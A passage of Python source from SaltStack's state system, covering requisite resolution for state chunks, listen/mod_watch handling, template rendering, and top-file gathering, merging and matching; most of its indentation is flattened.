        chunk is evaluated an event will be sent to the master with the
        results.
"""
if not self.opts.get("local") and (
self.opts.get("state_events", True) or fire_event
):
if not self.opts.get("master_uri"):
ev_func = lambda ret, tag, preload=None: salt.utils.event.get_master_event(
self.opts, self.opts["sock_dir"], listen=False
).fire_event(
ret, tag
)
else:
ev_func = self.functions["event.fire_master"]
ret = {"ret": chunk_ret}
if fire_event is True:
tag = salt.utils.event.tagify(
[self.jid, self.opts["id"], str(chunk_ret["name"])], "state_result",
)
elif isinstance(fire_event, str):
tag = salt.utils.event.tagify(
[self.jid, self.opts["id"], str(fire_event)], "state_result",
)
else:
tag = salt.utils.event.tagify(
[self.jid, "prog", self.opts["id"], str(chunk_ret["__run_num__"])],
"job",
)
ret["len"] = length
preload = {"jid": self.jid}
ev_func(ret, tag, preload=preload)
def call_chunk(self, low, running, chunks):
"""
Check if a chunk has any requires, execute the requires and then
the chunk
"""
low = self._mod_aggregate(low, running, chunks)
self._mod_init(low)
tag = _gen_tag(low)
if not low.get("prerequired"):
self.active.add(tag)
requisites = [
"require",
"require_any",
"watch",
"watch_any",
"prereq",
"onfail",
"onfail_any",
"onchanges",
"onchanges_any",
]
if not low.get("__prereq__"):
requisites.append("prerequired")
status, reqs = self.check_requisite(low, running, chunks, pre=True)
else:
status, reqs = self.check_requisite(low, running, chunks)
if status == "unmet":
lost = {}
reqs = []
for requisite in requisites:
lost[requisite] = []
if requisite not in low:
continue
for req in low[requisite]:
if isinstance(req, str):
req = {"id": req}
req = trim_req(req)
found = False
req_key = next(iter(req))
req_val = req[req_key]
for chunk in chunks:
if req_val is None:
continue
if req_key == "sls":
# Allow requisite tracking of entire sls files
if fnmatch.fnmatch(chunk["__sls__"], req_val):
if requisite == "prereq":
chunk["__prereq__"] = True
reqs.append(chunk)
found = True
continue
if fnmatch.fnmatch(chunk["name"], req_val) or fnmatch.fnmatch(
chunk["__id__"], req_val
):
if req_key == "id" or chunk["state"] == req_key:
if requisite == "prereq":
chunk["__prereq__"] = True
elif requisite == "prerequired":
chunk["__prerequired__"] = True
reqs.append(chunk)
found = True
if not found:
lost[requisite].append(req)
if (
lost["require"]
or lost["watch"]
or lost["prereq"]
or lost["onfail"]
or lost["onchanges"]
or lost["require_any"]
or lost["watch_any"]
or lost["onfail_any"]
or lost["onchanges_any"]
or lost.get("prerequired")
):
comment = "The following requisites were not found:\n"
for requisite, lreqs in lost.items():
if not lreqs:
continue
comment += "{}{}:\n".format(" " * 19, requisite)
for lreq in lreqs:
req_key = next(iter(lreq))
req_val = lreq[req_key]
comment += "{}{}: {}\n".format(" " * 23, req_key, req_val)
if low.get("__prereq__"):
run_dict = self.pre
else:
run_dict = running
start_time, duration = _calculate_fake_duration()
run_dict[tag] = {
"changes": {},
"result": False,
"duration": duration,
"start_time": start_time,
"comment": comment,
"__run_num__": self.__run_num,
"__sls__": low["__sls__"],
}
self.__run_num += 1
self.event(run_dict[tag], len(chunks), fire_event=low.get("fire_event"))
return running
for chunk in reqs:
# Check to see if the chunk has been run, only run it if
# it has not been run already
ctag = _gen_tag(chunk)
if ctag not in running:
if ctag in self.active:
if chunk.get("__prerequired__"):
                            # Prereq recursive, run this chunk with prereq on
if tag not in self.pre:
low["__prereq__"] = True
self.pre[ctag] = self.call(low, chunks, running)
return running
else:
return running
elif ctag not in running:
log.error("Recursive requisite found")
running[tag] = {
"changes": {},
"result": False,
"comment": "Recursive requisite found",
"__run_num__": self.__run_num,
"__sls__": low["__sls__"],
}
self.__run_num += 1
self.event(
running[tag], len(chunks), fire_event=low.get("fire_event")
)
return running
running = self.call_chunk(chunk, running, chunks)
if self.check_failhard(chunk, running):
running["__FAILHARD__"] = True
return running
if low.get("__prereq__"):
status, reqs = self.check_requisite(low, running, chunks)
self.pre[tag] = self.call(low, chunks, running)
if not self.pre[tag]["changes"] and status == "change":
self.pre[tag]["changes"] = {"watch": "watch"}
self.pre[tag]["result"] = None
else:
running = self.call_chunk(low, running, chunks)
if self.check_failhard(chunk, running):
running["__FAILHARD__"] = True
return running
elif status == "met":
if low.get("__prereq__"):
self.pre[tag] = self.call(low, chunks, running)
else:
running[tag] = self.call(low, chunks, running)
elif status == "fail":
# if the requisite that failed was due to a prereq on this low state
# show the normal error
if tag in self.pre:
running[tag] = self.pre[tag]
running[tag]["__run_num__"] = self.__run_num
running[tag]["__sls__"] = low["__sls__"]
# otherwise the failure was due to a requisite down the chain
else:
                # determine what the requisite failures were, and return
# a nice error message
failed_requisites = set()
# look at all requisite types for a failure
for req_lows in reqs.values():
for req_low in req_lows:
req_tag = _gen_tag(req_low)
req_ret = self.pre.get(req_tag, running.get(req_tag))
# if there is no run output for the requisite it
# can't be the failure
if req_ret is None:
continue
# If the result was False (not None) it was a failure
if req_ret["result"] is False:
                            # use SLS.ID for the key so it's easier to find
key = "{sls}.{_id}".format(
sls=req_low["__sls__"], _id=req_low["__id__"]
)
failed_requisites.add(key)
_cmt = "One or more requisite failed: {}".format(
", ".join(str(i) for i in failed_requisites)
)
start_time, duration = _calculate_fake_duration()
running[tag] = {
"changes": {},
"result": False,
"duration": duration,
"start_time": start_time,
"comment": _cmt,
"__run_num__": self.__run_num,
"__sls__": low["__sls__"],
}
self.pre[tag] = running[tag]
self.__run_num += 1
elif status == "change" and not low.get("__prereq__"):
ret = self.call(low, chunks, running)
if not ret["changes"] and not ret.get("skip_watch", False):
low = low.copy()
low["sfun"] = low["fun"]
low["fun"] = "mod_watch"
low["__reqs__"] = reqs
ret = self.call(low, chunks, running)
running[tag] = ret
elif status == "pre":
start_time, duration = _calculate_fake_duration()
pre_ret = {
"changes": {},
"result": True,
"duration": duration,
"start_time": start_time,
"comment": "No changes detected",
"__run_num__": self.__run_num,
"__sls__": low["__sls__"],
}
running[tag] = pre_ret
self.pre[tag] = pre_ret
self.__run_num += 1
elif status == "onfail":
start_time, duration = _calculate_fake_duration()
running[tag] = {
"changes": {},
"result": True,
"duration": duration,
"start_time": start_time,
"comment": "State was not run because onfail req did not change",
"__state_ran__": False,
"__run_num__": self.__run_num,
"__sls__": low["__sls__"],
}
self.__run_num += 1
elif status == "onchanges":
start_time, duration = _calculate_fake_duration()
running[tag] = {
"changes": {},
"result": True,
"duration": duration,
"start_time": start_time,
"comment": "State was not run because none of the onchanges reqs changed",
"__state_ran__": False,
"__run_num__": self.__run_num,
"__sls__": low["__sls__"],
}
self.__run_num += 1
else:
if low.get("__prereq__"):
self.pre[tag] = self.call(low, chunks, running)
else:
running[tag] = self.call(low, chunks, running)
if tag in running:
self.event(running[tag], len(chunks), fire_event=low.get("fire_event"))
for sub_state_data in running[tag].pop("sub_state_run", ()):
start_time, duration = _calculate_fake_duration()
self.__run_num += 1
sub_tag = _gen_tag(sub_state_data["low"])
running[sub_tag] = {
"name": sub_state_data["low"]["name"],
"changes": sub_state_data["changes"],
"result": sub_state_data["result"],
"duration": sub_state_data.get("duration", duration),
"start_time": sub_state_data.get("start_time", start_time),
"comment": sub_state_data.get("comment", ""),
"__state_ran__": True,
"__run_num__": self.__run_num,
"__sls__": low["__sls__"],
}
return running
def call_listen(self, chunks, running):
"""
Find all of the listen routines and call the associated mod_watch runs
"""
listeners = []
crefs = {}
for chunk in chunks:
crefs[(chunk["state"], chunk["__id__"], chunk["name"])] = chunk
if "listen" in chunk:
listeners.append(
{(chunk["state"], chunk["__id__"], chunk["name"]): chunk["listen"]}
)
if "listen_in" in chunk:
for l_in in chunk["listen_in"]:
for key, val in l_in.items():
listeners.append(
{(key, val, "lookup"): [{chunk["state"]: chunk["__id__"]}]}
)
mod_watchers = []
errors = {}
for l_dict in listeners:
for key, val in l_dict.items():
for listen_to in val:
if not isinstance(listen_to, dict):
found = False
for chunk in chunks:
if (
chunk["__id__"] == listen_to
or chunk["name"] == listen_to
):
listen_to = {chunk["state"]: chunk["__id__"]}
found = True
if not found:
continue
for lkey, lval in listen_to.items():
if not any(lkey == cref[0] and lval in cref for cref in crefs):
rerror = {
_l_tag(lkey, lval): {
"comment": "Referenced state {}: {} does not exist".format(
lkey, lval
),
"name": "listen_{}:{}".format(lkey, lval),
"result": False,
"changes": {},
}
}
errors.update(rerror)
continue
to_tags = [
_gen_tag(data)
for cref, data in crefs.items()
if lkey == cref[0] and lval in cref
]
for to_tag in to_tags:
if to_tag not in running:
continue
if running[to_tag]["changes"]:
if not any(
key[0] == cref[0] and key[1] in cref
for cref in crefs
):
rerror = {
_l_tag(key[0], key[1]): {
"comment": "Referenced state {}: {} does not exist".format(
key[0], key[1]
),
"name": "listen_{}:{}".format(
key[0], key[1]
),
"result": False,
"changes": {},
}
}
errors.update(rerror)
continue
new_chunks = [
data
for cref, data in crefs.items()
if key[0] == cref[0] and key[1] in cref
]
for chunk in new_chunks:
low = chunk.copy()
low["sfun"] = chunk["fun"]
low["fun"] = "mod_watch"
low["__id__"] = "listener_{}".format(low["__id__"])
for req in STATE_REQUISITE_KEYWORDS:
if req in low:
low.pop(req)
mod_watchers.append(low)
ret = self.call_chunks(mod_watchers)
running.update(ret)
for err in errors:
errors[err]["__run_num__"] = self.__run_num
self.__run_num += 1
running.update(errors)
return running
def call_high(self, high, orchestration_jid=None):
"""
Process a high data call and ensure the defined states.
"""
errors = []
# If there is extension data reconcile it
high, ext_errors = self.reconcile_extend(high)
errors.extend(ext_errors)
errors.extend(self.verify_high(high))
if errors:
return errors
high, req_in_errors = self.requisite_in(high)
errors.extend(req_in_errors)
high = self.apply_exclude(high)
# Verify that the high data is structurally sound
if errors:
return errors
# Compile and verify the raw chunks
chunks = self.compile_high_data(high, orchestration_jid)
# If there are extensions in the highstate, process them and update
# the low data chunks
if errors:
return errors
ret = self.call_chunks(chunks)
ret = self.call_listen(chunks, ret)
def _cleanup_accumulator_data():
accum_data_path = os.path.join(
get_accumulator_dir(self.opts["cachedir"]), self.instance_id
)
try:
os.remove(accum_data_path)
log.debug("Deleted accumulator data file %s", accum_data_path)
except OSError:
log.debug("File %s does not exist, no need to cleanup", accum_data_path)
_cleanup_accumulator_data()
if self.jid is not None:
pause_path = os.path.join(self.opts["cachedir"], "state_pause", self.jid)
if os.path.isfile(pause_path):
try:
os.remove(pause_path)
except OSError:
# File is not present, all is well
pass
return ret
def render_template(self, high, template):
errors = []
if not high:
return high, errors
if not isinstance(high, dict):
errors.append(
"Template {} does not render to a dictionary".format(template)
)
return high, errors
invalid_items = ("include", "exclude", "extends")
for item in invalid_items:
if item in high:
errors.append(
"The '{}' declaration found on '{}' is invalid when "
"rendering single templates".format(item, template)
)
return high, errors
for name in high:
if not isinstance(high[name], dict):
if isinstance(high[name], str):
                    # If this is a short state, it needs to be padded
if "." in high[name]:
comps = high[name].split(".")
high[name] = {
# '__sls__': template,
# '__env__': None,
comps[0]: [comps[1]]
}
continue
errors.append(
"ID {} in template {} is not a dictionary".format(
name, template
)
)
continue
skeys = set()
for key in sorted(high[name]):
if key.startswith("_"):
continue
if high[name][key] is None:
errors.append(
"ID '{}' in template {} contains a short "
"declaration ({}) with a trailing colon. When not "
"passing any arguments to a state, the colon must be "
"omitted.".format(name, template, key)
)
continue
if not isinstance(high[name][key], list):
continue
if "." in key:
comps = key.split(".")
# Salt doesn't support state files such as:
#
# /etc/redis/redis.conf:
# file.managed:
# - user: redis
# - group: redis
# - mode: 644
# file.comment:
# - regex: ^requirepass
if comps[0] in skeys:
errors.append(
"ID '{}' in template '{}' contains multiple "
"state declarations of the same type".format(name, template)
)
continue
high[name][comps[0]] = high[name].pop(key)
high[name][comps[0]].append(comps[1])
skeys.add(comps[0])
continue
skeys.add(key)
return high, errors
def call_template(self, template):
"""
Enforce the states in a template
"""
high = compile_template(
template,
self.rend,
self.opts["renderer"],
self.opts["renderer_blacklist"],
self.opts["renderer_whitelist"],
)
if not high:
return high
high, errors = self.render_template(high, template)
if errors:
return errors
return self.call_high(high)
def call_template_str(self, template):
"""
Enforce the states in a template, pass the template as a string
"""
high = compile_template_str(
template,
self.rend,
self.opts["renderer"],
self.opts["renderer_blacklist"],
self.opts["renderer_whitelist"],
)
if not high:
return high
high, errors = self.render_template(high, "<template-str>")
if errors:
return errors
return self.call_high(high)
class LazyAvailStates:
"""
The LazyAvailStates lazily loads the list of states of available
environments.
    This is particularly useful when top_file_merging_strategy=same and there
are many environments.
"""
def __init__(self, hs):
self._hs = hs
self._avail = {"base": None}
self._filled = False
def _fill(self):
if self._filled:
return
for saltenv in self._hs._get_envs():
if saltenv not in self._avail:
self._avail[saltenv] = None
self._filled = True
def __contains__(self, saltenv):
if saltenv == "base":
return True
self._fill()
return saltenv in self._avail
def __getitem__(self, saltenv):
if saltenv != "base":
self._fill()
if self._avail[saltenv] is None:
self._avail[saltenv] = self._hs.client.list_states(saltenv)
return self._avail[saltenv]
def items(self):
self._fill()
ret = []
        for saltenv in self._avail:
ret.append((saltenv, self.__getitem__(saltenv)))
return ret
class BaseHighState:
"""
The BaseHighState is an abstract base class that is the foundation of
    running a highstate; extend it and add a self.state object of type State.
When extending this class, please note that ``self.client`` and
``self.matcher`` should be instantiated and handled.
"""
def __init__(self, opts):
self.opts = self.__gen_opts(opts)
self.iorder = 10000
self.avail = self.__gather_avail()
self.serial = salt.payload.Serial(self.opts)
self.building_highstate = OrderedDict()
def __gather_avail(self):
"""
Lazily gather the lists of available sls data from the master
"""
return LazyAvailStates(self)
def __gen_opts(self, opts):
"""
The options used by the High State object are derived from options
on the minion and the master, or just the minion if the high state
call is entirely local.
"""
# If the state is intended to be applied locally, then the local opts
# should have all of the needed data, otherwise overwrite the local
# data items with data from the master
if "local_state" in opts:
if opts["local_state"]:
return opts
mopts = self.client.master_opts()
if not isinstance(mopts, dict):
# An error happened on the master
opts["renderer"] = "jinja|yaml"
opts["failhard"] = False
opts["state_top"] = salt.utils.url.create("top.sls")
opts["nodegroups"] = {}
opts["file_roots"] = {"base": [syspaths.BASE_FILE_ROOTS_DIR]}
else:
opts["renderer"] = mopts["renderer"]
opts["failhard"] = mopts.get("failhard", False)
if mopts["state_top"].startswith("salt://"):
opts["state_top"] = mopts["state_top"]
elif mopts["state_top"].startswith("/"):
opts["state_top"] = salt.utils.url.create(mopts["state_top"][1:])
else:
opts["state_top"] = salt.utils.url.create(mopts["state_top"])
opts["state_top_saltenv"] = mopts.get("state_top_saltenv", None)
opts["nodegroups"] = mopts.get("nodegroups", {})
opts["state_auto_order"] = mopts.get(
"state_auto_order", opts["state_auto_order"]
)
opts["file_roots"] = mopts["file_roots"]
opts["top_file_merging_strategy"] = mopts.get(
"top_file_merging_strategy", opts.get("top_file_merging_strategy")
)
opts["env_order"] = mopts.get("env_order", opts.get("env_order", []))
opts["default_top"] = mopts.get("default_top", opts.get("default_top"))
opts["state_events"] = mopts.get("state_events")
opts["state_aggregate"] = mopts.get(
"state_aggregate", opts.get("state_aggregate", False)
)
opts["jinja_env"] = mopts.get("jinja_env", {})
opts["jinja_sls_env"] = mopts.get("jinja_sls_env", {})
opts["jinja_lstrip_blocks"] = mopts.get("jinja_lstrip_blocks", False)
opts["jinja_trim_blocks"] = mopts.get("jinja_trim_blocks", False)
return opts
def _get_envs(self):
"""
Pull the file server environments out of the master options
"""
envs = ["base"]
if "file_roots" in self.opts:
envs.extend([x for x in list(self.opts["file_roots"]) if x not in envs])
env_order = self.opts.get("env_order", [])
# Remove duplicates while preserving the order
members = set()
env_order = [
env for env in env_order if not (env in members or members.add(env))
]
client_envs = self.client.envs()
if env_order and client_envs:
return [env for env in env_order if env in client_envs]
elif env_order:
return env_order
else:
envs.extend([env for env in client_envs if env not in envs])
return envs
def get_tops(self):
"""
Gather the top files
"""
tops = DefaultOrderedDict(list)
include = DefaultOrderedDict(list)
done = DefaultOrderedDict(list)
found = 0 # did we find any contents in the top files?
# Gather initial top files
merging_strategy = self.opts["top_file_merging_strategy"]
if merging_strategy == "same" and not self.opts["saltenv"]:
if not self.opts["default_top"]:
raise SaltRenderError(
"top_file_merging_strategy set to 'same', but no "
"default_top configuration option was set"
)
if self.opts["saltenv"]:
contents = self.client.cache_file(
self.opts["state_top"], self.opts["saltenv"]
)
if contents:
found = 1
tops[self.opts["saltenv"]] = [
compile_template(
contents,
self.state.rend,
self.state.opts["renderer"],
self.state.opts["renderer_blacklist"],
self.state.opts["renderer_whitelist"],
saltenv=self.opts["saltenv"],
)
]
else:
tops[self.opts["saltenv"]] = [{}]
else:
found = 0
state_top_saltenv = self.opts.get("state_top_saltenv", False)
if state_top_saltenv and not isinstance(state_top_saltenv, str):
state_top_saltenv = str(state_top_saltenv)
for saltenv in (
[state_top_saltenv] if state_top_saltenv else self._get_envs()
):
contents = self.client.cache_file(self.opts["state_top"], saltenv)
if contents:
found = found + 1
tops[saltenv].append(
compile_template(
contents,
self.state.rend,
self.state.opts["renderer"],
self.state.opts["renderer_blacklist"],
self.state.opts["renderer_whitelist"],
saltenv=saltenv,
)
)
else:
tops[saltenv].append({})
log.debug("No contents loaded for saltenv '%s'", saltenv)
if (
found > 1
and merging_strategy == "merge"
and not self.opts.get("env_order", None)
):
log.warning(
"top_file_merging_strategy is set to '%s' and "
"multiple top files were found. Merging order is not "
"deterministic, it may be desirable to either set "
"top_file_merging_strategy to 'same' or use the "
"'env_order' configuration parameter to specify the "
"merging order.",
merging_strategy,
)
if found == 0:
log.debug(
"No contents found in top file. If this is not expected, "
"verify that the 'file_roots' specified in 'etc/master' "
"are accessible. The 'file_roots' configuration is: %s",
repr(self.state.opts["file_roots"]),
)
# Search initial top files for includes
for saltenv, ctops in tops.items():
for ctop in ctops:
if "include" not in ctop:
continue
for sls in ctop["include"]:
include[saltenv].append(sls)
ctop.pop("include")
# Go through the includes and pull out the extra tops and add them
while include:
pops = []
for saltenv, states in include.items():
pops.append(saltenv)
if not states:
continue
for sls_match in states:
for sls in fnmatch.filter(self.avail[saltenv], sls_match):
if sls in done[saltenv]:
continue
tops[saltenv].append(
compile_template(
self.client.get_state(sls, saltenv).get("dest", False),
self.state.rend,
self.state.opts["renderer"],
self.state.opts["renderer_blacklist"],
self.state.opts["renderer_whitelist"],
saltenv,
)
)
done[saltenv].append(sls)
for saltenv in pops:
if saltenv in include:
include.pop(saltenv)
return tops
def merge_tops(self, tops):
"""
Cleanly merge the top files
"""
merging_strategy = self.opts["top_file_merging_strategy"]
try:
merge_attr = "_merge_tops_{}".format(merging_strategy)
merge_func = getattr(self, merge_attr)
if not hasattr(merge_func, "__call__"):
msg = "'{}' is not callable".format(merge_attr)
log.error(msg)
raise TypeError(msg)
except (AttributeError, TypeError):
log.warning(
"Invalid top_file_merging_strategy '%s', falling back to " "'merge'",
merging_strategy,
)
merge_func = self._merge_tops_merge
return merge_func(tops)
def _merge_tops_merge(self, tops):
"""
The default merging strategy. The base env is authoritative, so it is
checked first, followed by the remaining environments. In top files
from environments other than "base", only the section matching the
environment from the top file will be considered, and it too will be
ignored if that environment was defined in the "base" top file.
"""
top = DefaultOrderedDict(OrderedDict)
# Check base env first as it is authoritative
base_tops = tops.pop("base", DefaultOrderedDict(OrderedDict))
for ctop in base_tops:
for saltenv, targets in ctop.items():
if saltenv == "include":
continue
try:
for tgt in targets:
top[saltenv][tgt] = ctop[saltenv][tgt]
except TypeError:
raise SaltRenderError(
"Unable to render top file. No targets found."
)
for cenv, ctops in tops.items():
for ctop in ctops:
for saltenv, targets in ctop.items():
if saltenv == "include":
continue
elif saltenv != cenv:
log.debug(
"Section for saltenv '%s' in the '%s' "
"saltenv's top file will be ignored, as the "
"top_file_merging_strategy is set to 'merge' "
"and the saltenvs do not match",
saltenv,
cenv,
)
continue
elif saltenv in top:
log.debug(
"Section for saltenv '%s' in the '%s' "
"saltenv's top file will be ignored, as this "
"saltenv was already defined in the 'base' top "
"file",
saltenv,
cenv,
)
continue
try:
for tgt in targets:
top[saltenv][tgt] = ctop[saltenv][tgt]
except TypeError:
raise SaltRenderError(
"Unable to render top file. No targets found."
)
return top
def _merge_tops_same(self, tops):
"""
For each saltenv, only consider the top file from that saltenv. All
sections matching a given saltenv, which appear in a different
saltenv's top file, will be ignored.
"""
top = DefaultOrderedDict(OrderedDict)
for cenv, ctops in tops.items():
if all([x == {} for x in ctops]):
# No top file found in this env, check the default_top
default_top = self.opts["default_top"]
fallback_tops = tops.get(default_top, [])
if all([x == {} for x in fallback_tops]):
# Nothing in the fallback top file
log.error(
"The '%s' saltenv has no top file, and the fallback "
"saltenv specified by default_top (%s) also has no "
"top file",
cenv,
default_top,
)
continue
for ctop in fallback_tops:
for saltenv, targets in ctop.items():
if saltenv != cenv:
continue
log.debug(
"The '%s' saltenv has no top file, using the "
"default_top saltenv (%s)",
cenv,
default_top,
)
for tgt in targets:
top[saltenv][tgt] = ctop[saltenv][tgt]
break
else:
log.error(
"The '%s' saltenv has no top file, and no "
"matches were found in the top file for the "
"default_top saltenv (%s)",
cenv,
default_top,
)
continue
else:
for ctop in ctops:
for saltenv, targets in ctop.items():
if saltenv == "include":
continue
elif saltenv != cenv:
log.debug(
"Section for saltenv '%s' in the '%s' "
"saltenv's top file will be ignored, as the "
"top_file_merging_strategy is set to 'same' "
"and the saltenvs do not match",
saltenv,
cenv,
)
continue
try:
for tgt in targets:
top[saltenv][tgt] = ctop[saltenv][tgt]
except TypeError:
raise SaltRenderError(
"Unable to render top file. No targets found."
)
return top
def _merge_tops_merge_all(self, tops):
"""
Merge the top files into a single dictionary
"""
def _read_tgt(tgt):
match_type = None
states = []
for item in tgt:
if isinstance(item, dict):
match_type = item
if isinstance(item, str):
states.append(item)
return match_type, states
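        # Illustration: a top-file target rendered as
        #   [{'match': 'glob'}, 'web.server', 'common']
        # yields ({'match': 'glob'}, ['web.server', 'common']); a plain list of
        # SLS names yields (None, [...]).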
top = DefaultOrderedDict(OrderedDict)
for ctops in tops.values():
for ctop in ctops:
for saltenv, targets in ctop.items():
if saltenv == "include":
continue
try:
for tgt in targets:
if tgt not in top[saltenv]:
top[saltenv][tgt] = ctop[saltenv][tgt]
continue
m_type1, m_states1 = _read_tgt(top[saltenv][tgt])
m_type2, m_states2 = _read_tgt(ctop[saltenv][tgt])
merged = []
match_type = m_type2 or m_type1
if match_type is not None:
merged.append(match_type)
merged.extend(m_states1)
merged.extend([x for x in m_states2 if x not in merged])
top[saltenv][tgt] = merged
except TypeError:
raise SaltRenderError(
"Unable to render top file. No targets found."
)
return top
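    # Illustration of 'merge_all' (values are made up for the example): if the
    # 'base' top file maps target '*' to ['common'] and the 'dev' top file maps
    # the same target in the same saltenv to ['dev.tools'], the merged result
    # for that target is ['common', 'dev.tools'], with any match-type dict
    # ({'match': ...}) kept as the first element of the merged list.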
def verify_tops(self, tops):
"""
Verify the contents of the top file data
"""
errors = []
if not isinstance(tops, dict):
errors.append("Top data was not formed as a dict")
# No further checks will work, bail out
return errors
for saltenv, matches in tops.items():
if saltenv == "include":
continue
if not isinstance(saltenv, str):
errors.append(
"Environment {} in top file is not formed as a "
"string".format(saltenv)
)
if saltenv == "":
errors.append("Empty saltenv statement in top file")
if not isinstance(matches, dict):
errors.append(
"The top file matches for saltenv {} are not "
"formatted as a dict".format(saltenv)
)
for slsmods in matches.values():
if not isinstance(slsmods, list):
errors.append(
"Malformed topfile (state declarations not " "formed as a list)"
)
continue
for slsmod in slsmods:
if isinstance(slsmod, dict):
# This value is a match option
for val in slsmod.values():
if not val:
errors.append(
"Improperly formatted top file matcher "
"in saltenv {}: {} file".format(slsmod, val)
)
elif isinstance(slsmod, str):
# This is a sls module
if not slsmod:
errors.append(
"Environment {} contains an empty sls "
"index".format(saltenv)
)
return errors
def get_top(self):
"""
Returns the high data derived from the top file
"""
try:
tops = self.get_tops()
except SaltRenderError as err:
log.error("Unable to render top file: %s", err.error)
return {}
return self.merge_tops(tops)
def top_matches(self, top):
"""
Search through the top high data for matches and return the states
that this minion needs to execute.
Returns:
{'saltenv': ['state1', 'state2', ...]}
"""
matches = DefaultOrderedDict(OrderedDict)
# pylint: disable=cell-var-from-loop
for saltenv, body in top.items():
if self.opts["saltenv"]:
if saltenv != self.opts["saltenv"]:
continue
for match, data in body.items():
def _filter_matches(_match, _data, _opts):
if isinstance(_data, str):
_data = [_data]
if self.matchers["confirm_top.confirm_top"](_match, _data, _opts):
if saltenv not in matches:
matches[saltenv] = []
for item in _data:
if "subfilter" in item:
_tmpdata = item.pop("subfilter")
for match, data in _tmpdata.items():
_filter_matches(match, data, _opts)
if isinstance(item, str):
matches[saltenv].append(item)
elif isinstance(item, dict):
env_key, inc_sls = item.popitem()
if env_key not in self.avail:
continue
if env_key not in matches:
matches[env_key] = []
matches[env_key].append(inc_sls)
_filter_matches(match, data, self.opts["nodegroups"])
ext_matches = self._master_tops()
for saltenv in ext_matches:
top_file_matches = matches.get(saltenv, [])
if self.opts.get("master_tops_first"):
first = ext_matches[saltenv]
second = top_file_matches
else:
first = top_file_matches
second = ext_matches[saltenv]
matches[saltenv] = first + [x for x in second if x not in first]
# pylint: enable=cell-var-from-loop
return matches
def _master_tops(self):
"""
Get results from the master_tops system. Override this function if the
execution of the master_tops needs customization.
"""
return self.client.master_tops()
def load_dynamic(self, matches):
"""
If autoload_dynamic_modules is True then automatically load the
dynamic modules
"""
if not self.opts["autoload_dynamic_modules"]:
return
syncd = self.state.functions["saltutil.sync_all"](list(matches), refresh=False)
if syncd["grains"]:
self.opts["grains"] = salt.loader.grains(self.opts)
self.state.opts["pillar"] = self.state._gather_pillar()
self.state.module_refresh()
def render_state(self, sls, saltenv, mods, matches, local=False, context=None):
"""
Render a state file and retrieve all of the include states
"""
errors = []
if not local:
state_data = self.client.get_state(sls, saltenv)
fn_ = state_data.get("dest", False)
else:
fn_ = sls
if not os.path.isfile(fn_):
errors.append(
"Specified SLS {} on local filesystem cannot "
"be found.".format(sls)
)
state = None
if not fn_:
errors.append(
"Specified SLS {} in saltenv {} is not "
"available on the salt master or through a configured "
"fileserver".format(sls, saltenv)
)
else:
try:
state = compile_template(
fn_,
self.state.rend,
self.state.opts["renderer"],
self.state.opts["renderer_blacklist"],
self.state.opts["renderer_whitelist"],
saltenv,
sls,
rendered_sls=mods,
context=context,
)
except SaltRenderError as exc:
msg = "Rendering SLS '{}:{}' failed: {}".format(saltenv, sls, exc)
log.critical(msg)
errors.append(msg)
except Exception as exc: # pylint: disable=broad-except
msg = "Rendering SLS {} failed, render error: {}".format(sls, exc)
log.critical(
msg,
# Show the traceback if the debug logging level is enabled
exc_info_on_loglevel=logging.DEBUG,
)
errors.append("{}\n{}".format(msg, traceback.format_exc()))
try:
mods.add("{}:{}".format(saltenv, sls))
except AttributeError:
pass
if state:
if not isinstance(state, dict):
errors.append("SLS {} does not render to a dictionary".format(sls))
else:
include = []
if "include" in state:
if not isinstance(state["include"], list):
err = (
"Include Declaration in SLS {} is not formed "
"as a list".format(sls)
)
errors.append(err)
else:
include = state.pop("include")
self._handle_extend(state, sls, saltenv, errors)
self._handle_exclude(state, sls, saltenv, errors)
self._handle_state_decls(state, sls, saltenv, errors)
for inc_sls in include:
# inc_sls may take the form of:
# 'sls.to.include' <- same as {<saltenv>: 'sls.to.include'}
# {<env_key>: 'sls.to.include'}
# {'_xenv': 'sls.to.resolve'}
xenv_key = "_xenv"
if isinstance(inc_sls, dict):
env_key, inc_sls = inc_sls.popitem()
else:
env_key = saltenv
if env_key not in self.avail:
msg = (
"Nonexistent saltenv '{}' found in include "
"of '{}' within SLS '{}:{}'".format(
env_key, inc_sls, saltenv, sls
)
)
log.error(msg)
errors.append(msg)
continue
if inc_sls.startswith("."):
match = re.match(r"^(\.+)(.*)$", inc_sls)
if match:
levels, include = match.groups()
else:
msg = (
"Badly formatted include {} found in include "
"in SLS '{}:{}'".format(inc_sls, saltenv, sls)
)
log.error(msg)
errors.append(msg)
continue
level_count = len(levels)
p_comps = sls.split(".")
if state_data.get("source", "").endswith("/init.sls"):
p_comps.append("init")
if level_count > len(p_comps):
msg = (
"Attempted relative include of '{}' "
"within SLS '{}:{}' "
"goes beyond top level package ".format(
inc_sls, saltenv, sls
)
)
log.error(msg)
errors.append(msg)
continue
inc_sls = ".".join(p_comps[:-level_count] + [include])
if env_key != xenv_key:
if matches is None:
matches = []
# Resolve inc_sls in the specified environment
if env_key in matches or fnmatch.filter(
self.avail[env_key], inc_sls
):
resolved_envs = [env_key]
else:
resolved_envs = []
else:
# Resolve inc_sls in the subset of environment matches
resolved_envs = [
aenv
for aenv in matches
if fnmatch.filter(self.avail[aenv], inc_sls)
]
# An include must be resolved to a single environment, or
# the include must exist in the current environment
if len(resolved_envs) == 1 or saltenv in resolved_envs:
# Match inc_sls against the available states in the
# resolved env, matching wildcards in the process. If
# there were no matches, then leave inc_sls as the
# target so that the next recursion of render_state
# will recognize the error.
sls_targets = fnmatch.filter(self.avail[saltenv], inc_sls) or [
inc_sls
]
for sls_target in sls_targets:
r_env = (
resolved_envs[0] if len(resolved_envs) == 1 else saltenv
)
mod_tgt = "{}:{}".format(r_env, sls_target)
if mod_tgt not in mods:
nstate, err = self.render_state(
sls_target, r_env, mods, matches
)
if nstate:
self.merge_included_states(state, nstate, errors)
state.update(nstate)
if err:
errors.extend(err)
else:
msg = ""
if not resolved_envs:
msg = (
"Unknown include: Specified SLS {}: {} is not available on the salt "
"master in saltenv(s): {} "
).format(
env_key,
inc_sls,
", ".join(matches) if env_key == xenv_key else env_key,
)
elif len(resolved_envs) > 1:
msg = (
"Ambiguous include: Specified SLS {}: {} is available on the salt master "
"in multiple available saltenvs: {}"
).format(env_key, inc_sls, ", ".join(resolved_envs))
log.critical(msg)
errors.append(msg)
try:
self._handle_iorder(state)
except TypeError:
log.critical("Could not render SLS %s. Syntax error detected.", sls)
else:
state = {}
return state, errors
def _handle_iorder(self, state):
"""
Take a state and apply the iorder system
"""
if self.opts["state_auto_order"]:
for name in state:
for s_dec in state[name]:
